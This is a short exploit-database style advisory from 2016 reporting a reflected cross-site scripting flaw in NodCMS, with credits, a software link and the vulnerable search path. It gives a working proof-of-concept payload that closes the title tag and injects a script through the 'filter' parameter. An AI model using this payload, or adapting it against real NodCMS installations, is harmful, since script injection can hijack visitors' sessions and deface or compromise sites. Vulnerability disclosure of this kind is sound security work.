NodCMS suffers from a cross site scripting vulnerability.
67b9df9da3297615f3801c6acfb5b496dfb68103df20d1aa24dcbeeec602ee60
# Exploit Title : nodcms cross site scripting
# Author : Ashiyane Digital Security Team
# Date : 29/10/2016
# Type : webapps
# Platform : PHP
# Vendor Homepage : http://www.nodcms.com/en
Software link :
https://github.com/khodakhah/nodcms/archive/master.zip
#version : All version
####################################################################
Path Of Vulnerability :
http://sitname/en/search?filter=
example:
http://sitname/en/search?filter=</title><script>alert(/Amir.ght/)</script>
####################################################################
#-# Discovered by : Amir.ght
####################################################################